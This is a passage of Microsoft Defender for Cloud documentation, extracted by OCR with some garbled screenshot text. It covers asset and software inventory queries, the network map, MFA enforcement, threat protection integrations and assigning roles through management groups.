Resource name Ty Resource type Ty Subscription Ty Monitoring agent Ty Defender for Cloud Ty Recommendations Ty 
T Contoso Hotels Tenan... Subscription Contoso Hotels Tenant On as Er 
E govtestvm Virtual machines Contoso Infra1 © installed On B 
? Contoso Hotels Tenan... Subscription Contoso Hotels Tenant On B ss 
E channon-hicks-vm-test Virtual machines Contoso Infra1 © installed On PE mou 
? Contoso Infra1 Subscription Contoso Infra1 On = Ul Å. 
E kenieva-sql-server SQL servers Contoso Infra1 On B E + 


1 - Summaries 


Before you define any filters, a prominent strip of values at the top of the inventory view 
shows: 


e Total resources: The total number of resources connected to Defender for Cloud. 

e Unhealthy resources: Resources with active security recommendations that you 
can implement. Learn more about implementing security recommendations. 

e Unmonitored resources: Resources with agent monitoring issues - they have the 
Log Analytics agent deployed, but the agent isn't sending data or has other health 
issues. 

e Unregistered subscriptions: Any subscription in the selected scope that hasn't yet 
been connected to Microsoft Defender for Cloud. 


2 - Filters 


The multiple filters at the top of the page provide a way to quickly refine the list of 
resources according to the question you're trying to answer. For example, if you wanted 


to know which of your machines with the tag ‘Production’ are missing the Log Analytics 
agent, you can filter the list for Agent monitoring:"Not installed" and Tags:"Production". 


As soon as you've applied filters, the summary values are updated to relate to the query 


results. 


3 - Export and asset management tools 


Export options - Inventory includes an option to export the results of your selected filter 
options to a CSV file. You can also export the query itself to Azure Resource Graph 
Explorer to further refine, save, or modify the Kusto Query Language (KQL) query. 


Q Tip 


The KQL documentation provides a database with some sample data together with 
some simple queries to get the "feel" for the language. Learn more in this KQL 
tutorial. 


Asset management options - When you've found the resources that match your 
queries, inventory provides shortcuts for operations such as: 


e Assign tags to the filtered resources - select the checkboxes alongside the 
resources you want to tag. 

e Onboard new servers to Defender for Cloud - use the Add non-Azure servers 
toolbar button. 

e Automate workloads with Azure Logic Apps - use the Trigger Logic App button to 
run a logic app on one or more resources. Your logic apps have to be prepared in 
advance, and accept the relevant trigger type (HTTP request). Learn more about 


logic apps. 


How does asset inventory work? 


Asset inventory utilizes Azure Resource Graph (ARG), an Azure service that lets you 
query Defender for Cloud's security posture data across multiple subscriptions. 


ARG is designed to provide efficient resource exploration with the ability to query at 
scale. 


You can use Kusto Query Language (KQL) in the asset inventory to quickly produce deep 
insights by cross-referencing Defender for Cloud data with other resource properties. 


How to use asset inventory 


1. From Defender for Cloud's sidebar, select Inventory. 


2. Use the Filter by name box to display a specific resource, or use the filters to focus 
on specific resources. 


By default, the resources are sorted by the number of active security 
recommendations. 
@ Important 


The options in each filter are specific to the resources in the currently selected 
subscriptions and your selections in the other filters. 


For example, if you've selected only one subscription, and the subscription 
has no resources with outstanding security recommendations to remediate (0 
unhealthy resources), the Recommendations filter will have no options. 


Dashboard > Microsoft Defender for Cloud 
5a Microsoft Defender for Cloud | Inventory x 
s 8 subscriptions 
l P Search (®) Refresh -} Add non-Azure servers “S Open query d Download CSV repot lA 
General e 5 a z a 
Filter by name Subscriptions == All Resource Groups == All X Resource types == All X Defender for Cloud == All X 
© overview Monitoring ag Ii X Environment == All X ko Add filter 
@ Getting started 
Total Resources Unhealthy Resources Unmonitored Resources Unregistered subscriptions 


ebe #5761 ®% 3009 %0 % 0 


TZ Inventory 


Resource name Ty Resource type Ty * Monitoring agent Ty Defender for Cloud Ty Recommendations Ty 
a4 Workbooks 

@ singularitybase Container registries A On — | 
GA Community 

EI sqliaasextension Virtual machines Extens... A a 
eC Diagnose and solve problems 

$ vm5ws2016250 Network interfaces KI ITT rn 
Cloud Securit 

ty EG ascdockercontainer312 Network interfaces B E 

E secure Score II GZ containers-demo-ubutS66 Network interfaces = ren 
E Regulatory compliance E saltoremidiatea3a Network interfaces ee 
Q Workload protections E aks-agentpool-10453507-... On-premises machines 
E Firewall Manager Lia OO i caine ae = ' E SG 


Management 


Page | 4 v | of 116 Next 


I Pricing & settings 


3. To use the Security findings contain filter, enter free text from the ID, security 
check, or CVE name of a vulnerability finding to filter to the affected resources: 


Dashboard > Microsoft Defender for Cloud | Recommendations 176875-Debian Security Update for systemd 
Vulnerabilities in Azure Container Registry images should be remediated (pow 


“ Description 
Unhealthy registries Severity Total vulnerabilities Vulnerabilities by severity 


A Debian has released security update for systemd to fix the vulnerabilities. 
A 2/2 | Higl (x) 131 High 33 m 


Medium Ts 
“ General information 


Low rar 
D 176875 
Severity @ High 
vV Description Type Vulnerability 
V Remediation steps Published 5/6/2019, 1:54 PM GMT+3 
Patchable Yes 
V Affected resources 
Cvss 3.0 base score 98 
A Security Checks 
patzen OE CVE-2018-1049 of 
Findings CVE-2018-15686 of 
1D Security Check Category Applies To ^ Remediation 
176750 Debian Security Update for apache? Ll Debian 5 of 12 Scanned Images Refer to Debian 9 - CVE-2018-15686 and Debian 9 - CVE-2018-1049 to address 
this issue and obtain further details. 
176875 Debian Security Update for systemd | Debian 5 of 12 Scanned Images 
176853 Debian Security Update for libssh2 (0...) Debian 4 of 12 Scanned Images EGU 
Following are links for downloading patches to fix the vulnerabilities: 
177050 Debian Security Update for linux (DS... | Debian 3 of 12 Scanned Images 
CVE-2018-15686: Debian 
177442 Debian Security Update for file (DSA ... ] Debian 3 of 12 Scanned Images 
-2018-1049: 
177260 Debian Security Update for linux (DS... | Debian 3 of 12 Scanned Images CVE-2018-1049: Debian 


@ Tip 


The Security findings contain and Tags filters only accept a single value. To 
filter by more than one, use Add filters. 


4. To use the Defender for Cloud filter, select one or more options (Off, On, or 
Partial): 


e Off - Resources not protected by a Microsoft Defender plan. You can right- 
click on the resources and upgrade them: 


v] E etzien Virtual machines Contoso @ Monitored C= e TE 


TI B retaileusé Virtual machines Contoso @ Monitored C View resource see 


p E 


: : : Upgrade 
O EZ erein Virtual machines Contoso @ Monitored Cc Pg 


e On - Resources protected by a Microsoft Defender plan 


e Partial - Subscriptions with some but not all of the Microsoft Defender plans 
disabled. For example, the following subscription has seven Microsoft 
Defender plans disabled. 


gı Settings | Defender plans 


Contoso Infra2 


EI save 


Enhanced security off 


“A. Select Defender plan by resource type Enable all 


Enable all Microsoft Defender for Cloud plans 


Microsoft Defender for Resource Quantity Pricing Plan 

E servers 10 servers Server/Month o On en ) 
zd App Service 0 instances Instance/Month © K on ] off ; ) 
E, Azure SQL Databases 0 servers Server/Month © ( On r of J 
E SQL servers on machines 0 servers — © | GO rT of } 
al Open-source relational databases 0 servers Server/Month © ( On aD 
am Storage 3 storage accounts 10k transactions © ZETO of ` 
ZO Kubernetes 18 kubernetes cores VM core/Month o ZETA o; 

SO Container registries O container registries Image © On am) 
®© Key Vault 1 key vaults 10k transactions K on ] of 


Resource Manager 


1M resource mana... © 


@ ns 


1M DNS queries © 


5. To further examine the results of your query, select the resources that interest you. 


6. To view the current selected filter options as a query in Resource Graph Explorer, 
select Open query. 


Azure Resource Graph Explorer d & xX 


+ New query E Open a query [> Run query save [&] Save as Q Feedback All subscriptions Vv | 


Query 1 


1  securityresources 

2 | where type =~ "microsoft.security/assessments" 

3 | extend assessmentStatusCode = tostring(properties.status.code) 

4 | extend severity = case(assessmentStatusCode =~ "unhealthy", tolower(tostring(properties.metadata.severity)), tolower 
(assessmentStatusCode) ) 


5 | extend source = tostring(properties.resourceDetails.Source) 

6 | extend resourcelId = trim(" ", tolower(tostring(case(source =~ "azure", properties.resourceDetails.Id, 

7 source =~ "aws", properties.additionalData.AzureResourceld, 

8 source =~ "gcp", properties.additionalData.AzureResourceld, 

9 extract ("*(.+)/providers/Microsoft.Security/assessments/.+$",1, 


EO 


Get started Results Messages 


7. If you've defined some filters and left the page open, Defender for Cloud won't 
update the results automatically. Any changes to resources won't impact the 
displayed results unless you manually reload the page or select Refresh. 


Access a software inventory 


To access the software inventory, you'll need one of the following paid solutions: 


e Agentless machine scanning from Defender Cloud Security Posture Management 
(CSPM). 

e Agentless machine scanning from Defender for Servers P2. 

e Microsoft Defender for Endpoint integration from Defender for Servers. 


If you've already enabled the integration with Microsoft Defender for Endpoint and 
enabled Microsoft Defender for Servers, you'll have access to the software inventory. 


Dashboard > Microsoft Defender for Cloud 


fy Microsoft Defender for Cloud | Inventory ~ x 
Showing 64 subscriptions 

P Search (Ctrl+/) | « oO Refresh -} Add non-Azure servers E Open query A sign tags 4 Download CSV report (A) T 

iin [ Filter by name | Subscriptions == All Resource Groups == All X Defender for Cloud == All X Environment == All X 

D overview 


Installed applications == All X< ty Add filter 
@ Getting started 


» A Total Resources Unhealthy Resources Unmonitored Resources Unregistered subscriptions 
= Recommendations 


GE 65748 & 3007 A % 0 % 0 


‘Inventory € a 

Resource name Ty Resource type Ty Subscription Ty Monitoring age... Ty Defend... Ty Recom.. Ty 
@ workbooks 

U B vm: Virtual machines ASC DEMO OO Not installed On — 

GO Community 

E srv-work Virtual machines ASC DEMO © Installed On = 
@ Diagnose and solve problems 

E srv-jump Virtual machines ASC DEMO @ Installed On — 
Cloud Security TI D contosowebde Virtual machines ASC DEMO @ Installed On — E 
© Secure Score B contosowebbe2 Virtual machines ASC DEMO @ Installed On — 
E Regulatory compliance EA cqitoremidiate Virtual machines ASC DEMO OO Not installed On — 
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Management 


© Note 
The "Blank" option shows machines without Microsoft Defender for Endpoint or 
without Microsoft Defender for Servers. 

Besides the filters in the asset inventory page, you can explore the software inventory 


data from Azure Resource Graph Explorer. 


Examples of using Azure Resource Graph Explorer to access and explore software 
inventory data: 


1. Open Azure Resource Graph Explorer. 


Microsoft Azure IE Sr e 


Dashboard > Services See all 
0 Microsoft Defender for C ri resource Graph Explorer b 
Showing 73 subscriptions = : 
z Resource Graph queries 
a= ae e br t.a 


2. Select the following subscription scope: securityresources/softwareinventories 


3. Enter any of the following queries (or customize them or write your own!) and 
select Run query. 


e To generate a basic list of installed software: 
Kusto 


securityresources 


| where type == "microsoft.security/softwareinventories" 
| project id, Vendor=properties.vendor, 


Software=properties.softwareName, Version=properties.version 


e To filter by version numbers: 
Kusto 


securityresources 


| where type == "microsoft.security/softwareinventories" 
| project id, Vendor=properties.vendor, 


Software=properties.softwareName, Version=tostring(properties. 
version) 


| where Software=="windows_server_2019" and parse_version(Version) 
<=parse_version("10.0.17763.1999" ) 


e To find machines with a combination of software products: 
Kusto 


securityresources 
| where type == "microsoft.security/softwareinventories" 
| extend vmId = properties.azureVmId 


| where properties.softwareName == "apache _http_server" or 
properties.softwareName == "mysql" 


| summarize count() by tostring(vmId) 
| where count_ > 1 


e Combination of a software product with another security recommendation: 


(In this example — machines having MySQL installed and exposed 
management ports) 


Kusto 


securityresources 


| where type == "microsoft.security/softwareinventories" 
| extend vmId = tolower(properties.azureVmId) 

| where properties.softwareName == "mysql" 

| join ( 


securityresources 


| where type == "microsoft.security/assessments" 

| where properties.displayName == "Management ports should be 
closed on your virtual machines" and properties.status.code == 
"Unhealthy" 


| extend vmId = tolower(properties.resourceDetails.Id) 
) on vmId 


Next steps 


This article described the asset inventory page of Microsoft Defender for Cloud. 
For more information on related tools, see the following pages: 


e Azure Resource Graph (ARG) 
e Kusto Query Language (KQL) 


e View common question about asset inventory 


Protect your network resources 


Article e 04/18/2023 


Microsoft Defender for Cloud continuously analyzes the security state of your Azure 
resources for network security best practices. When Defender for Cloud identifies 
potential security vulnerabilities, it creates recommendations that guide you through the 
process of configuring the needed controls to harden and protect your resources. 


For a full list of the recommendations for Networking, see Networking 


recommendations. 


This article addresses recommendations that apply to your Azure resources from a 
network security perspective. Networking recommendations center around next 
generation firewalls, Network Security Groups, JIT VM access, overly permissive inbound 
traffic rules, and more. For a list of networking recommendations and remediation 


actions, see Managing security recommendations in Microsoft Defender for Cloud. 
The Networking features of Defender for Cloud include: 


e Network map (requires Microsoft Defender for Servers Plan 2) 
e Adaptive network hardening (requires Microsoft Defender for Servers Plan 2) 


e Networking security recommendations 


View your networking resources and their 
recommendations 


From the asset inventory page, use the resource type filter to select the networking 
resources that you want to investigate: 


Microsoft Defender for Cloud | Inventory (Preview) & x 


Showing 41 subscriptions 


Yw Subscriptions O Refresh ++ Add non-Azure servers Tz View in resource graph explorer 


| Filter by name | Resource groups All 0 seleted A Recommendations All Agent monitoring All 


Total Resources Unhealthy Resources Resource 
a 2874 4 1 43 3 local network gateways 
A | | network interfaces 
Resource name TA Resource type Ty Sub: | network security groups Ty Recommendaii... Ty 
E mwi Virtual machines ASC network security rules HO rn 
TI A mw Virtual machines asc [_] virtual network gateways ed 
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EA vm3 Virtual machines ASC do per 
EA srv-work Virtual machines ASC sO ern 


err ee 


Network map 


The interactive network map provides a graphical view with security overlays giving you 
recommendations and insights for hardening your network resources. Using the map 
you can see the network topology of your Azure workloads, connections between your 
virtual machines and subnets, and the capability to drill down from the map into specific 
resources and the recommendations for those resources. 


To open the Network map: 
1. From Defender for Cloud's menu, open the Workload protections dashboard. 


2. Select Network map. 
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Select the Layers menu choose Topology. 


The default view of the topology map displays: 


NetworkMap 


Currently selected subscriptions - The map is optimized for the subscriptions you 
selected in the portal. If you modify your selection, the map is regenerated with 
the new selections. 

VMs, subnets, and VNets of the Resource Manager resource type ("classic" Azure 
resources are not supported) 

Peered VNets 

Only resources that have network recommendations with a high or medium 
severity 


Internet-facing resources 


kMap 
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Understanding the network map 


The network map can show you your Azure resources in a Topology view and a Traffic 


view. 


The topology view 


In the Topology view of the networking map, you can view the following insights about 


your networking resources: 


In the inner circle, you can see all the VNets within your selected subscriptions, the 
next circle is all the subnets, the outer circle is all the virtual machines. 


e The lines connecting the resources in the map let you know which resources are 
associated with each other, and how your Azure network is structured. 

e Use the severity indicators to quickly get an overview of which resources have 
open recommendations from Defender for Cloud. 

e You can click any of the resources to drill down into them and view the details of 
that resource and its recommendations directly, and in the context of the Network 
map. 

e |f there are too many resources being displayed on the map, Microsoft Defender 
for Cloud uses its proprietary algorithm to ‘smart cluster’ your resources, 
highlighting the ones that are in the most critical state, and have the most high 


severity recommendations. 


Because the map is interactive and dynamic, every node is clickable, and the view can 
change based on the filters: 


1. You can modify what you see on the network map by using the filters at the top. 
You can focus the map based on: 


e Security health: You can filter the map based on Severity (High, Medium, 
Low) of your Azure resources. 

e Recommendations: You can select which resources are displayed based on 
which recommendations are active on those resources. For example, you can 
view only resources for which Defender for Cloud recommends you enable 
Network Security Groups. 

e Network zones: By default, the map displays only Internet facing resources, 
you can select internal VMs as well. 


2. You can click Reset in top left corner at any time to return the map to its default 
state. 


To drill down into a resource: 


1. When you select a specific resource on the map, the right pane opens and gives 
you general information about the resource, connected security solutions if there 
are any, and the recommendations relevant to the resource. It's the same type of 
behavior for each type of resource you select. 

2. When you hover over a node in the map, you can view general information about 
the resource, including subscription, resource type, and resource group. 

3. Use the link to zoom into the tool tip and refocus the map on that specific node. 

4. To refocus the map away from a specific node, zoom out. 


The Traffic view 


The Traffic view provides you with a map of all the possible traffic between your 
resources. This provides you with a visual map of all the rules you configured that define 
which resources can communicate with whom. This enables you to see the existing 
configuration of the network security groups as well as quickly identify possible risky 
configurations within your workloads. 


Uncover unwanted connections 


The strength of this view is in its ability to show you these allowed connections together 
with the vulnerabilities that exist, so you can use this cross-section of data to perform 
the necessary hardening on your resources. 


For example, you might detect two machines that you weren't aware could 
communicate, enabling you to better isolate the workloads and subnets. 


Investigate resources 
To drill down into a resource: 


1. When you select a specific resource on the map, the right pane opens and gives 
you general information about the resource, connected security solutions if there 
are any, and the recommendations relevant to the resource. It's the same type of 
behavior for each type of resource you select. 

2. Click Traffic to see the list of possible outbound and inbound traffic on the 
resource - this is a comprehensive list of who can communicate with the resource 
and who it can communicate with, and through which protocols and ports. For 
example, when you select a VM, all the VMs it can communicate with are shown, 
and when you select a subnet, all the subnets which it can communicate with are 


shown. 


This data is based on analysis of the Network Security Groups as well as advanced 
machine learning algorithms that analyze multiple rules to understand their 
crossovers and interactions. 
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Next steps 


To learn more about recommendations that apply to other Azure resource types, see the 
following: 


e Protecting your machines and applications in Microsoft Defender for Cloud 


Manage multifactor authentication 
(MFA) on your subscriptions 
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If you're using passwords only to authenticate your users, you're leaving an attack vector 
open. Users often use weak passwords or reuse them for multiple services. With MFA Z 
enabled, your accounts are more secure, and users can still authenticate to almost any 


application with single sign-on (SSO). 


There are multiple ways to enable MFA for your Microsoft Entra users based on the 
licenses that your organization owns. This page provides the details for each in the 
context of Microsoft Defender for Cloud. 


MFA and Microsoft Defender for Cloud 


Defender for Cloud places a high value on MFA. The security control that contributes the 
most to your secure score is Enable MFA. 


The following recommendations in the Enable MFA control ensure you're meeting the 
recommended practices for users of your subscriptions: 


e Accounts with owner permissions on Azure resources should be MFA enabled 
e Accounts with write permissions on Azure resources should be MFA enabled 
e Accounts with read permissions on Azure resources should be MFA enabled 


There are three ways to enable MFA and be compliant with the two recommendations in 
Defender for Cloud: security defaults, per-user assignment, and conditional access (CA) 


policy. 


Free option - security defaults 


If you're using the free edition of Microsoft Entra ID, you should use the security 
defaults to enable multifactor authentication on your tenant. 


MFA for Microsoft 365 Business, E3, or E5 customers 


Customers with Microsoft 365 can use Per-user assignment. In this scenario, Microsoft 
Entra multifactor authentication is either enabled or disabled for all users, for all sign-in 
events. There's no ability to enable multifactor authentication for a subset of users, or 
under certain scenarios, and management is through the Office 365 portal. 


MFA for Microsoft Entra ID P1 or P2 customers 


For an improved user experience, upgrade to Microsoft Entra ID P1 or P2 for conditional 
access (CA) policy options. To configure a CA policy, you need Microsoft Entra tenant 


permissions. 
Your CA policy must: 
e enforce MFA 


e include the Microsoft Azure Management app ID (797f4846-ba00-4fd7-ba43- 
dac1f8f63013) or all apps 


e not exclude the Microsoft Azure Management app ID 


Microsoft Entra ID P1 customers can use Microsoft Entra CA to prompt users for 
multifactor authentication during certain scenarios or events to fit your business 
requirements. Other licenses that include this functionality: Enterprise Mobility + 
Security E3, Microsoft 365 F1, and Microsoft 365 E3. 


Microsoft Entra ID P2 provides the strongest security features and an improved user 
experience. This license adds risk-based conditional access to the Microsoft Entra ID P1 
features. Risk-based CA adapts to your users’ patterns and minimizes multifactor 
authentication prompts. Other licenses that include this functionality: Enterprise Mobility 
+ Security E5 or Microsoft 365 E5. 


Learn more in the Azure Conditional Access documentation. 


Identify accounts without multifactor 
authentication (MFA) enabled 


You can view the list of user accounts without MFA enabled from either the Defender for 
Cloud recommendations details page, or by using the Azure Resource Graph. 


View the accounts without MFA enabled in the Azure 
portal 


From the recommendation details page, select a subscription from the Unhealthy 
resources list or select Take action and the list will be displayed. 


View the accounts without MFA enabled using Azure 
Resource Graph 


To see which accounts don't have MFA enabled, use the following Azure Resource Graph 
query. The query returns all unhealthy resources - accounts - of the recommendation 
"Accounts with owner permissions on Azure resources should be MFA enabled". 


1. Open Azure Resource Graph Explorer. 


Microsoft Azure TES 


Dashboard > 


Services See all 
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2. Enter the following query and select Run query. 


securityresources 


| where type =~ "microsoft.security/assessments/subassessments" 

| where id has "assessments/dabc9bc4-b8a8-45bd-9a5a-43000df8aa1c" or id 
has “assessments/c@cb17b2 - 0607 -48a7 -b@e0-903ed22de39b" or id has 
"assessments/6240402e-f77c -46fa-9060-a7ce53997754" 


| parse id with start "/assessments/" assessmentId "/subassessments/" 
userObjectId 


| summarize make_list(userObjectId) by 
strcat(tostring(properties.displayName), " (", assessmentId, ")") 


| project ["Recommendation Name"] = Column1 , ["Account ObjectIDs"] = 
list_userObjectId 


3. The additionalData property reveals the list of account object IDs for accounts 
that don't have MFA enforced. 


O Note 


The ‘Account ObjectIDs' column contains the list of account object IDs for 
accounts that don't have MFA enforced per recommendation. 


Q Tip 


Alternatively, you can use the Defender for Cloud REST API method 
Assessments - Get. 


Limitations 


e Conditional Access feature to enforce MFA on external users/tenants isn't 
supported yet. 

e Conditional Access policy applied to Microsoft Entra roles (such as all global 
admins, external users, external domain, etc.) isn't supported yet. 

e External MFA solutions such as Okta, Ping, Duo, and more aren't supported within 


the identity MFA recommendations. 


Next steps 


To learn more about recommendations that apply to other Azure resource types, see the 


following articles: 


e Protecting your network in Microsoft Defender for Cloud 
e Check out common questions about MFA. 


Other threat protections in Microsoft 
Defender for Cloud 
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In addition to its built-in advanced protection plans, Microsoft Defender for Cloud also 
offers the following threat protection capabilities. 


Q Tip 


To enable Defender for Cloud's threat protection capabilities, you must enable 
enhanced security features on the subscription containing the applicable 
workloads. 


Threat protection for Azure network layer 


Defenders for Cloud network-layer analytics are based on sample IPFIX data’, which 
are packet headers collected by Azure core routers. Based on this data feed, Defender 
for Cloud uses machine learning models to identify and flag malicious traffic activities. 
Defender for Cloud also uses the Microsoft Threat Intelligence database to enrich IP 
addresses. 


Some network configurations restrict Defender for Cloud from generating alerts on 
suspicious network activity. For Defender for Cloud to generate network alerts, ensure 
that: 


e Your virtual machine has a public IP address (or is on a load balancer with a public 
IP address). 

e Your virtual machine's network egress traffic isn't blocked by an external IDS 
solution. 


For a list of the Azure network layer alerts, see the Reference table of alerts. 


Stream security alerts from other Microsoft 
services 


Display Azure WAF alerts in Defender for Cloud 


Azure Application Gateway offers a web application firewall (WAF) that provides 
centralized protection of your web applications from common exploits and 
vulnerabilities. 


Web applications are increasingly targeted by malicious attacks that exploit commonly 
known vulnerabilities. The Application Gateway WAF is based on Core Rule Set 3.0 or 
2.2.9 from the Open Web Application Security Project. The WAF is updated automatically 
to protect against new vulnerabilities. 


If you have created WAF Security solution, your WAF alerts are streamed to Defender for 
Cloud with no other configurations. For more information on the alerts generated by 
WAF, see Web application firewall CRS rule groups and rules. 


© Note 


Only WAF v1 is supported and will work with Microsoft Defender for Cloud. 


To deploy Azure's Application Gateway WAF, do the following: 
1. From the Azure portal, open Defender for Cloud. 
2. From Defender for Cloud's menu, select Security solutions. 


3. In the Add data sources section, select Add for Azure's Application Gateway WAF. 


Home > Microsoft Defender for Cloud 


sss Microsoft Defender for Cloud | Security solutions d 
BEE 7 
owing 17 subscriptions 
EEE AF Filer 
General 


WV Connected solutions (4) 


@ security alerts View all security solutions currently connected to Defender for Cloud, monitor the health of solutions, and access the solutions’ management tools for advanced configuration. 


E. Cloud Security Explorer 


CheckPoint-Firewall-Cen... Barracuda © QualysVa1 MicrosoftWaf 
Cloud Security 


CHECK POINT BARRACUDA NETWORKS, INC. QUALYS, INC. MICROSOFT 
© Security posture Next Generation Firewall Web Application Firewall Vulnerability Assessment Saas-based Web Application Firewall 
ASC DEMO ASC DEMO ASC DEMO ASC DEMO 


E DevOps Security (Preview) 


AEE A Stopped reporting © Not reported © Healthy @ Healthy 


E Security solutions 
VIEW VIEW VIEW VIEW 


\ Add data sources (3) 


Connect your security solution to Defender for Cloud. 


Azure Application 

Non-Azure servers ZO SIEM 
E. = Gateway WAF 
MICROSOFT SELECTED SIEMS MICROSOFT 
Onboard your non-Azure computers to Integrate Microsoft Defender for Cloud Deploy Azure's WAF to protect your 
Defender for Cloud and gain security alerts into SIEM for a central web applications from common threats. 
assessment, recommendations and monitoring. See the list of supported WAF's security alerts will be shown in 
more powerful features SIEMs the Defender for Cloud's alerts queue. Q 


eo ea 


Display Azure DDoS Protection alerts in Defender for 
Cloud 


Distributed denial of service (DDoS) attacks are known to be easy to execute. They've 
become a great security concern, particularly if you're moving your applications to the 
cloud. A DDoS attack attempts to exhaust an application's resources, making the 
application unavailable to legitimate users. DDoS attacks can target any endpoint that 
can be reached through the internet. 


To defend against DDoS attacks, purchase a license for Azure DDoS Protection and 
ensure you're following application design best practices. DDoS Protection provides 
different service tiers. For more information, see Azure DDoS Protection overview. 


If you have Azure DDoS Protection enabled, your DDoS alerts are streamed to Defender 
for Cloud with no other configuration needed. For more information on the alerts 
generated by DDoS Protection, see Reference table of alerts. 


Microsoft Entra Permissions Management 
(formerly Cloudknox) 


Microsoft Entra Permissions Management is a cloud infrastructure entitlement 
management (CIEM) solution. Microsoft Entra Permission Management provides 
comprehensive visibility and control over permissions for any identity and any resource 
in Azure, AWS, and GCP. 


As part of the integration, each onboarded Azure subscription, AWS account, and GCP 
project give you a view of your Permission Creep Index (PCI). The PCI is an aggregated 
metric that periodically evaluates the level of risk associated with the number of unused 
or excessive permissions across identities and resources. PCI measures how risky 
identities can potentially be, based on the permissions available to them. 
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Next steps 


To learn more about the security alerts from these threat protection features, see the 
following articles: 


e Reference table for all Defender for Cloud alerts 


e Security alerts in Defender for Cloud 
e Manage and respond to security alerts in Defender for Cloud 
e Continuously export Defender for Cloud data 


Organize subscriptions into 
management groups and assign roles to 
users 
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Manage your organization's security posture at scale by applying security policies to all 
Azure subscriptions linked to your Microsoft Entra tenant. 


For visibility into the security posture of all subscriptions linked to a Microsoft Entra 
tenant, you'll need an Azure role with sufficient read permissions assigned on the root 
management group. 


Organize your subscriptions into management 
groups 


Overview of management groups 


Use management groups to efficiently manage access, policies, and reporting on groups 
of subscriptions, and effectively manage the entire Azure estate by performing actions 
on the root management group. You can organize subscriptions into management 
groups and apply your governance policies to the management groups. All 
subscriptions within a management group automatically inherit the policies applied to 
the management group. 


Each Microsoft Entra tenant is given a single top-level management group called the 
root management group. This root management group is built into the hierarchy to 
have all management groups and subscriptions fold up to it. This group allows global 
policies and Azure role assignments to be applied at the directory level. 


The root management group is created automatically when you do any of the following 
actions: 


e Inthe Azure portal Z, select Management Groups . 
e Create a management group with an API call. 
e Create a management group with PowerShell. For PowerShell instructions, see 


Create management groups for resource and organization management. 


Management groups aren't required to onboard Defender for Cloud, but we 
recommend creating at least one so that the root management group gets created. 


After the group is created, all subscriptions under your Microsoft Entra tenant will be 
linked to it. 


For a detailed overview of management groups, see the Organize your resources with 
Azure management groups article. 


View and create management groups in the Azure portal 
1. Sign in to the Azure portal £. 
2. Search for and select Management Groups. 


3. To create a management group, select Create, enter the relevant details, and select 
Submit. 
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e The Management Group ID is the directory unique identifier that is used to 
submit commands on this management group. This identifier isn't editable 
after creation as it is used throughout the Azure system to identify this group. 


e The display name field is the name that is displayed within the Azure portal. A 
separate display name is an optional field when creating the management 
group and can be changed at any time. 


Add subscriptions to a management group 
You can add subscriptions to the management group that you created. 
1. Sign in to the Azure portal Z. 


2. Search for and select Management Groups. 


3. Select the management group for your subscription. 


4. When the group's page opens, select Subscriptions. 


5. From the subscriptions page, select Add, then select your subscriptions and select 
Save. Repeat until you've added all the subscriptions in the scope. 
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© Important 


Management groups can contain both subscriptions and child management 
groups. When you assign a user an Azure role to the parent management 
group, the access is inherited by the child management group's subscriptions. 
Policies set at the parent management group are also inherited by the 
children. 


Assign Azure roles to other users 


Assign Azure roles to users through the Azure portal: 
1. Sign in to the Azure portal £. 
2. Search for and select Management Groups. 
3. Select the relevant management group. 


4. Select Access control (IAM), open the Role assignments tab and select Add > Add 
role assignment. 
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5. From the Add role assignment page, select the relevant role. 


Add role assignment ~ x 


Role Members Review + assign 


A role definition is a collection of permissions. You can use the built-in roles or you can create your own 
custom roles. Learn more & 


P Search by role name or description Type: All Category : All 

Name Ty Description Ty Type Ty Category Ty Details 
Owner Grants full access to manage all resources, including the ability to a... BuiltInRole General View 
Contributor Grants full access to manage all resources, but does not allow you... BuiltinRole General View 
Reader View all resources, but does not allow you to make any changes. BuiltinRole General View 
AcrDelete acr delete BuiltinRole Containers View 
AcrimageSigner acr image signer BuiltinRole Containers View 
AcrPull acr pull BuiltinRole Containers View 
AcrPush acr push BuiltinRole Containers View 
AcrQuarantineReader acr quarantine data reader BuiltinRole Containers View 
AcrQuarantineWriter acr quarantine data writer BuiltinRole Containers View 


6. From the Members tab, select + Select members and assign the role to the 
relevant members. 


7. On the Review + assign tab, select Review + assign to assign the role. 


Assign Azure roles to users with PowerShell: 
1. Install Azure PowerShell. 
2. Run the following commands: 
Azure PowerShell 


# Login to Azure as a Global Administrator user 
Connect -AzAccount 


3. When prompted, sign in with global admin credentials. 


Microsoft Azure 


B® Microsoft 
Sign in 


Email, phone, or Skype 


Can't access your account? 


No account? Create one 


4. Grant reader role permissions by running the following command: 


Azure PowerShell 


# Add Reader role to the required user on the Root Management Group 
# Replace "“user@domian.com” with the user to grant access to 


New-AzRoleAssignment -SignInName "“user@domain.com" -RoleDefinitionName 
"Reader" -Scope "/" 


5. To remove the role, use the following command: 
Azure PowerShell 


Remove-AzRoleAssignment -SignInName “user@domain.com" - 
RoleDefinitionName "Reader" -Scope "/" 


Remove elevated access 


Once the Azure roles have been assigned to the users, the tenant administrator should 
remove itself from the user access administrator role. 


1. Sign in to the Azure portal Z. 
2. In the navigation list, select Microsoft Entra ID and then select Properties. 
3. Under Access management for Azure resources, set the switch to No. 


4. To save your setting, select Save. 


Next steps 


On this page, you learned how to organize subscriptions into management groups and 
assign roles to users. For related information, see: 


e Permissions in Microsoft Defender for Cloud 


Grant and request tenant-wide visibility 
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A user with the Microsoft Entra role of Global Administrator might have tenant-wide 


responsibilities, but lack the Azure permissions to view that organization-wide 


information in Microsoft Defender for Cloud. Permission elevation is required because 


Microsoft Entra role assignments don't grant access to Azure resources. 


Grant tenant-wide permissions to yourself 


To assign yourself tenant-level permissions: 


1. If your organization manages resource access with Microsoft Entra Privileged 


Identity Management (PIM), or any other PIM tool, the global administrator role 


must be active for the user. 


2. As a Global Administrator user without an assignment on the root management 


group of the tenant, open Defender for Cloud's Overview page and select the 


tenant-wide visibility link in the banner. 
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Improve your secure score > 


3. Select the new Azure role to be assigned. 
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Learn more about Microsoft Defender for Cloud's roles and permissions. 
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Cancel 
Improve your secure score > ETA ZS 


Ọ Tip 


Generally, the Security Admin role is required to apply policies on the root 
level, while Security Reader will suffice to provide tenant-level visibility. For 
more information about the permissions granted by these roles, see the 
Security Admin built-in role description or the Security Reader built-in role 
description. 


For differences between these roles specific to Defender for Cloud, see the 
table in Roles and allowed actions. 
The organizational-wide view is achieved by granting roles on the root 
management group level of the tenant. 


4. Sign out of the Azure portal, and then log back in again. 


5. Once you have elevated access, open or refresh Microsoft Defender for Cloud to 
verify you have visibility into all subscriptions under your Microsoft Entra tenant. 


The process of assigning yourself tenant-level permissions, performs many operations 
automatically for you: 


